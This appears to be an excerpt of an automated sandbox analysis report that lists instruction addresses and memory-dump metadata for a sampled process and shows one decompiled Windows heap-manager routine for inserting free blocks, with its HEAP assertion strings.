                                                0x00959a80
                                                0x00959a77
                                                0x009446ff
                                                0x00939b97
                                                0x00939b97
                                                0x00939b9a
                                                0x00939b9c
                                                0x00948909
                                                0x0094890b
                                                0x00939ba2
                                                0x00939bb0
                                                0x00939bb0
                                                0x00939bb6
                                                0x00939bb6
                                                0x00939bbf
                                                0x00939bc2
                                                0x00939bc6
                                                0x00939bc9
                                                0x00939de5
                                                0x00939dec
                                                0x00939df4
                                                0x00939dfa
                                                0x00939dfd
                                                0x00939e06
                                                0x00939e0c
                                                0x00939e12
                                                0x00939e18
                                                0x00939e1f
                                                0x00939e24
                                                0x00939e24
                                                0x00939e24
                                                0x00939e24
                                                0x00939e37
                                                0x00939e3a
                                                0x00939bcf
                                                0x00939bcf
                                                0x00939bcf
                                                0x00939bcf
                                                0x00939bcf
                                                0x00939bd3
                                                0x00939bda
                                                0x00939bde
                                                0x00948a98
                                                0x00948a9d
                                                0x00948aa0
                                                0x00948aa5
                                                0x00948aa9
                                                0x00948aab
                                                0x00948913
                                                0x00948915
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0094891b
                                                0x00948ab1
                                                0x00948ab1
                                                0x00948ab8
                                                0x00959a8b
                                                0x00959a8d
                                                0x00959a99
                                                0x00959a9c
                                                0x00959a9f
                                                0x00959ac1
                                                0x00959ac6
                                                0x00959aa1
                                                0x00959ab9
                                                0x00959abe
                                                0x00959acc
                                                0x00959ad1
                                                0x00959ad9
                                                0x00959ad9
                                                0x00959a8d
                                                0x00948abe
                                                0x00948ac2
                                                0x00948ac5
                                                0x00948ac8
                                                0x00948c32
                                                0x00948ace
                                                0x00948ace
                                                0x00948ace
                                                0x00948ace
                                                0x00948ad7
                                                0x00948ad7
                                                0x00948ada
                                                0x00948add
                                                0x00959ae3
                                                0x00959ae3
                                                0x00959aea
                                                0x00959af0
                                                0x00959af4
                                                0x00959b00
                                                0x00959b03
                                                0x00959b07
                                                0x00959d7a
                                                0x00959d7f
                                                0x00959b0d
                                                0x00959b25
                                                0x00959b2a
                                                0x00959d85
                                                0x00959d8a
                                                0x00959d92
                                                0x00959d92
                                                0x00959af4
                                                0x00000000
                                                0x00948ae3
                                                0x00948af2
                                                0x00948af7
                                                0x00948af9
                                                0x00959b30
                                                0x00959b32
                                                0x00959b35
                                                0x00959b3a
                                                0x00959b3e
                                                0x00959b57
                                                0x00959b57
                                                0x00948941
                                                0x00948941
                                                0x00948944
                                                0x009342da
                                                0x009342da
                                                0x009342db
                                                0x0091eefb
                                                0x00000000
                                                0x0091eefc
                                                0x00948aff
                                                0x00948b06
                                                0x00959b67
                                                0x00959b6a
                                                0x00959b71
                                                0x00959b80
                                                0x00959b80
                                                0x00959b71
                                                0x00948b0c
                                                0x00948b12
                                                0x00948b15
                                                0x00948b1a
                                                0x00948b1c
                                                0x00948b1c
                                                0x00948b1c
                                                0x00948b1c
                                                0x00948b26
                                                0x00948b2e
                                                0x00948b35
                                                0x00948b40
                                                0x00948b43
                                                0x00948b46
                                                0x00948b4c
                                                0x00948b4f
                                                0x00948b55
                                                0x00948b57
                                                0x00948b57
                                                0x00948b57
                                                0x00948b57
                                                0x00948b5d
                                                0x00948b61
                                                0x00948bed
                                                0x00948bed
                                                0x00948bf2
                                                0x00948bf4
                                                0x00959c21
                                                0x00959c28
                                                0x00959c46
                                                0x00959c46
                                                0x00959c28
                                                0x00948bfa
                                                0x00948bff
                                                0x00948c01
                                                0x00959c53
                                                0x00959c54
                                                0x00959c57
                                                0x00959d62
                                                0x00959d68
                                                0x00959d69
                                                0x00959d6c
                                                0x00959d6f
                                                0x00959d70
                                                0x00959d70
                                                0x00000000
                                                0x00948b67
                                                0x00948b6a
                                                0x00948b71
                                                0x00948b74
                                                0x00948b78
                                                0x00948b84
                                                0x00948b86
                                                0x00948b88
                                                0x00948920
                                                0x00948924
                                                0x00959c0a
                                                0x00959c10
                                                0x00959c10
                                                0x00000000
                                                0x00948924
                                                0x00948b8e
                                                0x00948b92
                                                0x00948b9f
                                                0x00948ba2
                                                0x00948ba5
                                                0x00948bac
                                                0x00959b8a
                                                0x00959b8e
                                                0x00959b9a
                                                0x00959b9d
                                                0x00959ba1
                                                0x00959bc3
                                                0x00959bc8
                                                0x00959ba3
                                                0x00959bbb
                                                0x00959bc0
                                                0x00959bce
                                                0x00959bd3
                                                0x00959bdb
                                                0x00959bdb
                                                0x00959b8e
                                                0x00948bb2
                                                0x00948bb6
                                                0x00948bb9
                                                0x00948bbb
                                                0x00959be5
                                                0x00948bc1
                                                0x00948bc8
                                                0x00948bc9
                                                0x00948bcc
                                                0x00948bce
                                                0x00959bec
                                                0x00959bec
                                                0x00959bee
                                                0x00959bf0
                                                0x00959bf1
                                                0x00959bf2
                                                0x00959bf3
                                                0x00959bf5
                                                0x00959bfa
                                                0x00948bdf
                                                0x00948bdf
                                                0x00948be8
                                                0x00000000
                                                0x00948be8
                                                0x00948bd4
                                                0x00948bd9
                                                0x00000000
                                                0x00000000
                                                0x00948bd9
                                                0x00000000
                                                0x00948bbb
                                                0x00948b61
                                                0x00948add
                                                0x00939be4
                                                0x00939be4
                                                0x00939be7
                                                0x00939bed
                                                0x00939bf2
                                                0x00939bf4
                                                0x00939bf7
                                                0x00939bfa
                                                0x00939bfc
                                                0x00959c5f
                                                0x00959c65
                                                0x00959c65
                                                0x00939c02
                                                0x00939c06
                                                0x00939c09
                                                0x00939e43
                                                0x00939c0f
                                                0x00939c0f
                                                0x00939c0f
                                                0x00939c13
                                                0x00939c15
                                                0x00939c18
                                                0x00939c1a
                                                0x00000000
                                                0x00939c20
                                                0x00939c20
                                                0x00939c22
                                                0x00939c26
                                                0x00939c29
                                                0x00939c45
                                                0x00939c45
                                                0x00939c47
                                                0x00939c7e
                                                0x00939c7e
                                                0x00939c82
                                                0x00939d1b
                                                0x00939d29
                                                0x00939d35
                                                0x00939d3a
                                                0x00939d3f
                                                0x00939d41
                                                0x00959d2d
                                                0x00959d34
                                                0x00959d50
                                                0x00959d50
                                                0x00959d34
                                                0x00939d47
                                                0x00939d4c
                                                0x00939d4e
                                                0x00000000
                                                0x00939d54
                                                0x00959d5d
                                                0x00959d5e
                                                0x00959d60
                                                0x00000000
                                                0x00959d60
                                                0x00939d4e
                                                0x00939c88
                                                0x00939c8f
                                                0x00939c92
                                                0x00939c96
                                                0x00939c99
                                                0x00939c9c
                                                0x00939c9f
                                                0x00939ca2
                                                0x00939ca5
                                                0x00939ca7
                                                0x0094892f
                                                0x00948933
                                                0x00948936
                                                0x00959d16
                                                0x00959d1c
                                                0x00939d15
                                                0x00939d15
                                                0x00939d18
                                                0x00000000
                                                0x00939d18
                                                0x00000000
                                                0x0094893c
                                                0x00939cad
                                                0x00939cb1
                                                0x00939cc4
                                                0x00939cc7
                                                0x00939cca
                                                0x00939cd1
                                                0x00959c96
                                                0x00959c9a
                                                0x00959ca6
                                                0x00959ca9
                                                0x00959cad
                                                0x00959ccf
                                                0x00959cd4
                                                0x00959caf
                                                0x00959cc7
                                                0x00959ccc
                                                0x00959cda
                                                0x00959cdf
                                                0x00959ce7
                                                0x00959ce7
                                                0x00959c9a
                                                0x00939cd7
                                                0x00939cda
                                                0x00939cde
                                                0x00939ce1
                                                0x00939ce3
                                                0x00959cf1
                                                0x00939ce9
                                                0x00939cf0
                                                0x00939cf1
                                                0x00939cf4
                                                0x00939cf6
                                                0x00959cf8
                                                0x00959cf8
                                                0x00959cfa
                                                0x00959cfc
                                                0x00959cfd
                                                0x00959cfe
                                                0x00959cff
                                                0x00959d01
                                                0x00959d06
                                                0x00939d07
                                                0x00939d07
                                                0x00939d10
                                                0x00000000
                                                0x00939d10
                                                0x00939cfc
                                                0x00939d01
                                                0x00000000
                                                0x00000000
                                                0x00939d01
                                                0x00000000
                                                0x00939ce3
                                                0x00939c49
                                                0x00939c5e
                                                0x00939c63
                                                0x00939c65
                                                0x00000000
                                                0x00000000
                                                0x00939c6b
                                                0x00939c72
                                                0x00959c73
                                                0x00959c76
                                                0x00959c7d
                                                0x00959c8c
                                                0x00959c8c
                                                0x00959c7d
                                                0x00939c78
                                                0x00939c7b
                                                0x00000000
                                                0x00939c7b
                                                0x00939c2b
                                                0x00939c2e
                                                0x00939c32
                                                0x00000000
                                                0x00000000
                                                0x00939c34
                                                0x00939c36
                                                0x00000000
                                                0x00000000
                                                0x00939c3c
                                                0x00939c3f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00939c3f
                                                0x00939c1a
                                                0x0091ee77
                                                0x0091ee7d
                                                0x009342d6
                                                0x009342d6
                                                0x009342d7
                                                0x00000000
                                                0x009342d7
                                                0x0091ee86
                                                0x0091ee8b
                                                0x00000000
                                                0x0091eeaa
                                                0x0091eeaa
                                                0x0091eeba
                                                0x0091eebd
                                                0x0091eecc
                                                0x00000000
                                                0x0091eed2
                                                0x0091eed7
                                                0x0091eee8
                                                0x0091eef5
                                                0x0091eef9
                                                0x0091ef02
                                                0x0091ef0f
                                                0x0091ef11
                                                0x0091ef13
                                                0x0091ef17
                                                0x0091ef1c
                                                0x0091ef1e
                                                0x0091ef1e
                                                0x0091ef13
                                                0x00000000
                                                0x0091eef9
                                                0x0091eecc

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-523794902
                                                • Opcode ID: e31f0d179dee30ab969b92fc4198aac8956b2a3dce9749f084caebe2f07bec41
                                                • Instruction ID: 309e5df146bcef8fee9e6067fd16c2f11d99b4061a9114c7783468ee14850a65
                                                • Opcode Fuzzy Hash: e31f0d179dee30ab969b92fc4198aac8956b2a3dce9749f084caebe2f07bec41
                                                • Instruction Fuzzy Hash: 5432DD70604649EFEB11CF68C880FAAB7F9FF44314F148459F8558B292CB74EA85DB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00907353, Relevance: 5.5, Strings: 4, Instructions: 466COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 62%
                                                			E00907353(signed int _a4, signed int _a8, void* _a11, signed int _a12) {
				signed int _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed short _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				signed short _t197;
				signed int _t200;
				signed int _t201;
				signed int _t205;
				signed short _t206;
				signed short _t210;
				signed short _t211;
				intOrPtr _t218;
				signed short _t220;
				signed int _t221;
				signed short _t223;
				signed short* _t225;
				signed short _t226;
				signed short* _t229;
				signed short _t230;
				signed short _t237;
				signed int _t239;
				signed short _t240;
				signed short _t248;
				signed short _t249;
				signed short _t257;
				signed int _t266;
				signed short _t268;
				signed int _t269;
				signed int _t270;
				signed short* _t276;
				signed short* _t277;
				signed int _t282;
				intOrPtr _t284;
				signed int* _t286;
				signed short _t291;
				signed short _t294;
				signed short _t297;
				signed short _t298;
				signed int _t299;
				signed short _t304;
				signed int _t305;
				signed short _t307;
				signed short _t310;
				signed short _t311;
				intOrPtr _t318;
				intOrPtr _t319;
				signed short _t320;
				signed short _t321;
				signed int _t323;
				void* _t327;
				signed short _t329;
				signed int _t330;
				intOrPtr _t333;
				signed int _t335;
				signed int _t336;
				signed short _t340;
				signed short _t341;
				signed short _t342;
				signed short _t343;
				signed int _t344;
				signed int _t348;
				signed int _t350;
				intOrPtr _t353;
				signed short* _t354;

				if(_a12 == 0) {
					return _t197;
				} else {
					_push(__ebx);
					_push(__esi);
					__esi = _a8;
					_push(__edi);
					__edi = _a4;
					__ebx = ( *(__esi + 4) ^  *(__edi + 0x54)) & 0x0000ffff;
					__eflags = __bx;
					if(__bx == 0) {
						__eflags =  *0x9d77b0 - 1;
						if( *0x9d77b0 >= 1) {
							__eflags =  *(__esi + 2) & 0x00000008;
							if(( *(__esi + 2) & 0x00000008) == 0) {
								__esi + 0xfff = __esi + 0x00000fff & 0xfffff000;
								__eflags = (__esi + 0x00000fff & 0xfffff000) - __esi;
								if((__esi + 0x00000fff & 0xfffff000) != __esi) {
									__eax =  *[fs:0x18];
									__eax =  *( *[fs:0x18] + 0x30);
									__eflags =  *(__eax + 0xc);
									if( *(__eax + 0xc) == 0) {
										_push("HEAP: ");
										__eax = E0094373B();
									} else {
										 *[fs:0x18] =  *( *[fs:0x18] + 0x30);
										 *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) + 0xc));
										 *((intOrPtr*)( *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) + 0xc)) + 0x2c = E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) + 0xc)) + 0x2c);
										_pop(__ecx);
									}
									_pop(__ecx);
									_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
									__eax = E0094373B();
									_pop(__ecx);
									__eax = E0099F826(__ebx, __edx, __edi, __esi, 1);
								}
							}
						}
					}
					__al =  *((intOrPtr*)(__esi + 6));
					__eflags = __al;
					if(__al == 0) {
						_v28 = __edi;
					} else {
						__ecx = __al & 0x000000ff;
						__eax = __esi;
						__ecx = (__al & 0x000000ff) << 0x10;
						__esi & 0xffff0000 = (__esi & 0xffff0000) - __ecx;
						__eax = (__esi & 0xffff0000) - __ecx + 0x10000;
						__eflags = __eax;
						_v28 = __eax;
					}
					__al =  *(__esi + 2);
					_a11 =  *(__esi + 2);
					do {
						__eflags = _a12 - 0xfe00;
						if(_a12 > 0xfe00) {
							__eflags = _a12 - 0xfe01;
							_v8 = 0xfe00;
							if(_a12 == 0xfe01) {
								_v8 = 0xfdf0;
							}
							_t354[1] = 0;
						} else {
							_v8 = _a12 & 0x0000ffff;
							_t354[1] = _a11;
						}
						_t333 = _a4;
						_t354[2] =  *(_t333 + 0x54) ^ _t266;
						_t205 = _v28;
						_t284 =  *((intOrPtr*)(_t205 + 0x18));
						__eflags = _t284 - _t205;
						if(_t284 == _t205) {
							_t268 = 0;
						} else {
							_t268 = (_t354 - _t205 >> 0x10) + 1;
							__eflags = _t268;
							if(__eflags <= 0) {
								L113:
								_push(0);
								_push(0);
								_push(_t205);
								_push(_t354);
								_push(_t284);
								_push(3);
								E0099F840(_t268, _t284, _t318, _t333, _t354, __eflags);
								L11:
								_t206 = _v8;
								_t354[1] = _t354[1] & 0x000000f0;
								_t354[3] = _t268;
								 *_t354 = _t206;
								_t354[1] = 0;
								_t354[3] = 0;
								__eflags =  *(_t333 + 0x40) & 0x00000040;
								_t269 = _t206 & 0x0000ffff;
								if(( *(_t333 + 0x40) & 0x00000040) != 0) {
									E009289F0( &(_t354[8]), _t269 * 8 - 0x10, 0xfeeefeee);
									_t354[1] = _t354[1] | 0x00000004;
								}
								_t210 =  *(_t333 + 0xb8);
								__eflags = _t210;
								if(_t210 == 0) {
									_t211 =  *(_t333 + 0xc4);
									goto L41;
								} else {
									while(1) {
										__eflags = _t269 -  *((intOrPtr*)(_t210 + 4));
										if(_t269 <  *((intOrPtr*)(_t210 + 4))) {
											break;
										}
										_t311 =  *_t210;
										__eflags = _t311;
										if(_t311 != 0) {
											_t210 = _t311;
											continue;
										} else {
											_t298 =  *((intOrPtr*)(_t210 + 4)) - 1;
											__eflags = _t298;
											_v24 = _t298;
											L16:
											_t276 = _t210 + 0x14;
											while(1) {
												_t320 =  *(_t210 + 0x18);
												_t299 = _t298 -  *_t276;
												_v12 = _t210;
												_t218 =  *((intOrPtr*)(_t320 + 4));
												_v20 = _t320;
												__eflags = _t320 - _t218;
												if(_t320 == _t218) {
													goto L79;
												}
												L18:
												_t321 =  *(_t333 + 0x4c);
												_v32 = _t321;
												__eflags = _t321;
												if(_t321 == 0) {
													_t220 =  *(_t218 - 8) & 0x0000ffff;
												} else {
													_t249 =  *(_t218 - 8);
													_t330 =  *(_t333 + 0x4c);
													_v32 = _t330;
													__eflags = _t249 & _t330;
													if((_t249 & _t330) != 0) {
														_t249 = _t249 ^  *(_t333 + 0x50);
														__eflags = _t249;
													}
													_t220 = _t249 & 0x0000ffff;
												}
												_t221 = _v8 & 0x0000ffff;
												_v36 = _t221;
												__eflags = _t221 - (_t220 & 0x0000ffff);
												_t223 = _v20;
												if(_t221 - (_t220 & 0x0000ffff) > 0) {
													L73:
													_v16 = _t223;
													goto L40;
												} else {
													_t323 = _v32;
													_t225 =  *_t223 - 8;
													__eflags = _t323;
													if(_t323 == 0) {
														_t226 =  *_t225 & 0x0000ffff;
													} else {
														_t248 =  *_t225;
														_t323 =  *(_t333 + 0x4c);
														__eflags = _t248 & _t323;
														if((_t248 & _t323) != 0) {
															_t248 = _t248 ^  *(_t333 + 0x50);
															__eflags = _t248;
														}
														_t226 = _t248 & 0x0000ffff;
													}
													__eflags = _v36 - (_t226 & 0x0000ffff);
													if(_v36 - (_t226 & 0x0000ffff) <= 0) {
														_t223 =  *_v20;
														goto L73;
													} else {
														_t229 = _v12;
														__eflags =  *_t229;
														if( *_t229 != 0) {
															L84:
															_t230 = _v12;
															_t348 = _t299 >> 5;
															_t277 =  *((intOrPtr*)(_t230 + 0x1c)) + _t348 * 4;
															_t327 = ( *((intOrPtr*)(_t230 + 4)) -  *_t276 >> 5) - 1;
															_t237 =  !((1 << (_t299 & 0x0000001f)) - 1) &  *_t277;
															__eflags = 1;
															if(1 != 0) {
																L88:
																__eflags = _t237 & 0x0000ffff;
																if((_t237 & 0x0000ffff) == 0) {
																	_t304 = _t237 >> 0x00000010 & 0x000000ff;
																	__eflags = _t304;
																	if(_t304 != 0) {
																		_t163 = _t304 + 0x9037f8; // 0x10008
																		_t239 = ( *_t163 & 0x000000ff) + 0x10;
																	} else {
																		_t162 = (_t237 >> 0x18) + 0x9037f8; // 0x10008
																		_t239 = ( *_t162 & 0x000000ff) + 0x18;
																	}
																} else {
																	_t329 = _t237 & 0x000000ff;
																	__eflags = _t329;
																	if(_t329 == 0) {
																		_t161 = (_t237 >> 0x00000008 & 0x000000ff) + 0x9037f8; // 0x10008
																		_t239 = ( *_t161 & 0x000000ff) + 8;
																	} else {
																		_t154 = _t329 + 0x9037f8; // 0x10008
																		_t239 =  *_t154 & 0x000000ff;
																	}
																}
																_t350 = (_t348 << 5) + _t239;
																_t240 = _v12;
																__eflags =  *(_t240 + 8);
																_t305 = _t350 + _t350;
																if( *(_t240 + 8) == 0) {
																	_t305 = _t350;
																}
																_t223 =  *( *((intOrPtr*)(_t240 + 0x20)) + _t305 * 4);
																goto L73;
															} else {
																goto L85;
															}
															while(1) {
																L85:
																__eflags = _t348 - _t327;
																if(_t348 > _t327) {
																	break;
																}
																_t277 =  &(_t277[2]);
																_t237 =  *_t277;
																_t348 = _t348 + 1;
																__eflags = _t237;
																if(_t237 == 0) {
																	continue;
																}
																break;
															}
															__eflags = _t237;
															if(_t237 == 0) {
																_v16 = _v16 & 0x00000000;
																L40:
																_t211 = _v16;
																__eflags = _t211;
																if(_t211 == 0) {
																	_t210 =  *_v12;
																	_t333 = _a4;
																	_t276 = _t210 + 0x14;
																	_t298 =  *_t276;
																	_v24 = _t298;
																	_t320 =  *(_t210 + 0x18);
																	_t299 = _t298 -  *_t276;
																	_v12 = _t210;
																	_t218 =  *((intOrPtr*)(_t320 + 4));
																	_v20 = _t320;
																	__eflags = _t320 - _t218;
																	if(_t320 == _t218) {
																		goto L79;
																	}
																	goto L18;
																}
																L41:
																_t319 = _a4;
																_t77 = _t319 + 0xc4; // 0xc4
																__eflags = _t77 - _t211;
																if(_t77 == _t211) {
																	L48:
																	_t286 =  *(_t211 + 4);
																	_t270 =  *_t286;
																	_t331 =  &(_t354[4]);
																	__eflags = _t270 - _t211;
																	if(__eflags != 0) {
																		_push(0);
																		_push(_t270);
																		_push(0);
																		_push(_t211);
																		_push(0);
																		_push(0xc);
																		E0099F840(_t270, 0, _t319, _t331, _t354, __eflags);
																		_t318 = _a4;
																	} else {
																		 *_t331 = _t211;
																		 *(_t331 + 4) = _t286;
																		 *_t286 = _t331;
																		 *(_t211 + 4) = _t331;
																	}
																	 *((intOrPtr*)(_t318 + 0x78)) =  *((intOrPtr*)(_t318 + 0x78)) + ( *_t354 & 0x0000ffff);
																	_t197 =  *(_t318 + 0xb8);
																	__eflags = _t197;
																	if(_t197 == 0) {
																		L66:
																		if( *(_t318 + 0x4c) != 0) {
																			_t354[1] = _t354[0] ^ _t354[1] ^  *_t354;
																			 *_t354 =  *_t354 ^  *(_t318 + 0x50);
																		}
																		_t200 = _v8 & 0x0000ffff;
																		_a12 = _a12 - _t200;
																		_t266 = _v8 & 0x0000ffff;
																		_t354 = _t354 + _t200 * 8;
																		_t201 = _v28;
																		if(_t354 >=  *((intOrPtr*)(_t201 + 0x28))) {
																			L71:
																			return _t201;
																		} else {
																			goto L69;
																		}
																	} else {
																		_t291 =  *_t354 & 0x0000ffff;
																		while(1) {
																			__eflags = _t291 -  *((intOrPtr*)(_t197 + 4));
																			if(_t291 <  *((intOrPtr*)(_t197 + 4))) {
																				break;
																			}
																			_t343 =  *_t197;
																			__eflags = _t343;
																			if(_t343 != 0) {
																				_t197 = _t343;
																				continue;
																			}
																			_t291 =  *((intOrPtr*)(_t197 + 4)) - 1;
																			__eflags = _t291;
																			break;
																		}
																		_v32 = _t291;
																		_t282 = _t291 -  *((intOrPtr*)(_t197 + 0x14));
																		__eflags =  *(_t197 + 8);
																		_v20 = _t282;
																		_t335 = _t282 + _t282;
																		if( *(_t197 + 8) == 0) {
																			_t335 = _t282;
																		}
																		 *((intOrPtr*)(_t197 + 0xc)) =  *((intOrPtr*)(_t197 + 0xc)) + 1;
																		_t336 = _t335 << 2;
																		_v36 = _t336;
																		_v24 =  *(_t336 +  *(_t197 + 0x20));
																		__eflags = _v32 -  *((intOrPtr*)(_t197 + 4)) - 1;
																		if(_v32 ==  *((intOrPtr*)(_t197 + 4)) - 1) {
																			_t107 = _t197 + 0x10;
																			 *_t107 =  *(_t197 + 0x10) + 1;
																			__eflags =  *_t107;
																		}
																		_t340 = _v24;
																		__eflags = _t340;
																		if(_t340 == 0) {
																			L64:
																			_t331 =  *(_t197 + 0x20);
																			 *(_v36 +  *(_t197 + 0x20)) =  &(_t354[4]);
																			_t282 = _v20;
																			goto L65;
																		} else {
																			__eflags =  *(_t318 + 0x4c);
																			if( *(_t318 + 0x4c) == 0) {
																				_t341 =  *(_t340 - 8) & 0x0000ffff;
																			} else {
																				_t342 =  *(_t340 - 8);
																				__eflags =  *(_t318 + 0x4c) & _t342;
																				if(( *(_t318 + 0x4c) & _t342) != 0) {
																					_t342 = _t342 ^  *(_t318 + 0x50);
																					__eflags = _t342;
																				}
																				_t341 = _t342 & 0x0000ffff;
																			}
																			_t331 = _t341 & 0x0000ffff;
																			__eflags = ( *_t354 & 0x0000ffff) - (_t341 & 0x0000ffff);
																			if(( *_t354 & 0x0000ffff) - (_t341 & 0x0000ffff) > 0) {
																				L65:
																				__eflags = _v24;
																				if(_v24 == 0) {
																					 *( *((intOrPtr*)(_t197 + 0x1c)) + (_t282 >> 5) * 4) =  *( *((intOrPtr*)(_t197 + 0x1c)) + (_t282 >> 5) * 4) | 1 << (_t282 & 0x0000001f);
																					_t318 = _a4;
																				}
																				goto L66;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																_t344 =  *(_t319 + 0x4c);
																while(1) {
																	__eflags = _t344;
																	if(_t344 == 0) {
																		_t294 =  *(_t211 - 8) & 0x0000ffff;
																	} else {
																		_t297 =  *(_t211 - 8);
																		_t344 =  *(_t319 + 0x4c);
																		__eflags = _t297 & _t344;
																		if((_t297 & _t344) != 0) {
																			_t297 = _t297 ^  *(_t319 + 0x50);
																			__eflags = _t297;
																		}
																		_t294 = _t297 & 0x0000ffff;
																	}
																	__eflags = (_v8 & 0x0000ffff) - (_t294 & 0x0000ffff);
																	if((_v8 & 0x0000ffff) <= (_t294 & 0x0000ffff)) {
																		goto L48;
																	}
																	_t211 =  *_t211;
																	_t189 = _t319 + 0xc4; // 0xc4
																	__eflags = _t189 - _t211;
																	if(_t189 == _t211) {
																		goto L48;
																	}
																}
																goto L48;
															}
															goto L88;
														}
														__eflags = _v24 - _t229[2] - 1;
														if(_v24 != _t229[2] - 1) {
															goto L84;
														}
														__eflags = _t229[4];
														if(_t229[4] != 0) {
															_t299 = _t299 + _t299;
															__eflags = _t299;
														}
														_t223 =  *(_t229[0x10] + _t299 * 4);
														__eflags = _v20 - _t223;
														if(_v20 == _t223) {
															goto L40;
														} else {
															_t353 = _a4;
															while(1) {
																__eflags = _t323;
																if(_t323 == 0) {
																	_t307 =  *(_t223 - 8) & 0x0000ffff;
																} else {
																	_t310 =  *(_t223 - 8);
																	_t323 =  *(_t353 + 0x4c);
																	__eflags = _t310 & _t323;
																	if((_t310 & _t323) != 0) {
																		_t310 = _t310 ^  *(_t353 + 0x50);
																		__eflags = _t310;
																	}
																	_t307 = _t310 & 0x0000ffff;
																}
																__eflags = (_v8 & 0x0000ffff) - (_t307 & 0x0000ffff);
																if((_v8 & 0x0000ffff) - (_t307 & 0x0000ffff) <= 0) {
																	goto L73;
																}
																_t223 =  *_t223;
																__eflags = _v20 - _t223;
																if(_v20 != _t223) {
																	continue;
																}
																goto L40;
															}
															goto L73;
														}
													}
												}
												L79:
												_v16 = _t320;
												goto L40;
											}
										}
									}
									_t298 = _t269;
									_v24 = _t269;
									goto L16;
								}
							}
							__eflags = _t268 - 0xfe;
							if(__eflags >= 0) {
								goto L113;
							}
						}
						goto L11;
						L69:
					} while (_a12 != 0);
					_t201 =  *(_a4 + 0x54) ^ _v8;
					_t354[2] = _t201;
					if(_v8 == 0) {
						__eflags =  *0x9d77b0 - 1;
						if( *0x9d77b0 >= 1) {
							_t201 =  &(_t354[0x7ff]) & 0xfffff000;
							__eflags = _t201 - _t354;
							if(_t201 != _t354) {
								_t257 =  *( *[fs:0x18] + 0x30);
								__eflags =  *(_t257 + 0xc);
								if( *(_t257 + 0xc) == 0) {
									_push("HEAP: ");
									E0094373B();
								} else {
									E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) + 0xc)) + 0x2c);
								}
								_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
								E0094373B();
								_t201 = E0099F826(_t266, _t318, _t331, _t354, 1);
							}
						}
					}
					goto L71;
				}
			}











































































                                                0x0090735f
                                                0x00907678
                                                0x00907365
                                                0x00907365
                                                0x00907366
                                                0x00907367
                                                0x0090736e
                                                0x0090736f
                                                0x00907376
                                                0x00907379
                                                0x0090737c
                                                0x00939e61
                                                0x00939e68
                                                0x0094da67
                                                0x0094da6b
                                                0x0094da77
                                                0x0094da7c
                                                0x0094da7e
                                                0x0094da84
                                                0x0094da8a
                                                0x0094da8d
                                                0x0094da91
                                                0x0094dab3
                                                0x0094dab8
                                                0x0094da93
                                                0x0094da99
                                                0x0094da9f
                                                0x0094daab
                                                0x0094dab0
                                                0x0094dab0
                                                0x0094dabd
                                                0x0094dabe
                                                0x0094dac3
                                                0x0094dac8
                                                0x0094dacb
                                                0x0094dacb
                                                0x0094da7e
                                                0x0094da6b
                                                0x00939e68
                                                0x00907382
                                                0x00907385
                                                0x00907387
                                                0x00907691
                                                0x0090738d
                                                0x0090738d
                                                0x00907390
                                                0x00907392
                                                0x0090739a
                                                0x0090739c
                                                0x0090739c
                                                0x009073a1
                                                0x009073a1
                                                0x009073a4
                                                0x009073a7
                                                0x009073aa
                                                0x009073af
                                                0x009073b2
                                                0x00934be6
                                                0x00934bed
                                                0x00934bf0
                                                0x0094dad5
                                                0x0094dad5
                                                0x00934bf6
                                                0x009073b8
                                                0x009073bc
                                                0x009073c2
                                                0x009073c2
                                                0x009073c5
                                                0x009073cf
                                                0x009073d3
                                                0x009073d6
                                                0x009073d9
                                                0x009073db
                                                0x00907699
                                                0x009073e1
                                                0x009073e8
                                                0x009073e9
                                                0x009073eb
                                                0x0094dae1
                                                0x0094dae1
                                                0x0094dae3
                                                0x0094dae5
                                                0x0094dae6
                                                0x0094dae7
                                                0x0094dae8
                                                0x0094daea
                                                0x009073fd
                                                0x009073fd
                                                0x00907400
                                                0x00907404
                                                0x00907407
                                                0x0090740a
                                                0x0090740e
                                                0x00907412
                                                0x00907416
                                                0x00907419
                                                0x0094db05
                                                0x0094db0a
                                                0x0094db0a
                                                0x0090741f
                                                0x00907425
                                                0x00907427
                                                0x0091e26a
                                                0x00000000
                                                0x0090742d
                                                0x0090742d
                                                0x0090742d
                                                0x00907430
                                                0x00000000
                                                0x00000000
                                                0x00907436
                                                0x00907438
                                                0x0090743a
                                                0x00907683
                                                0x00000000
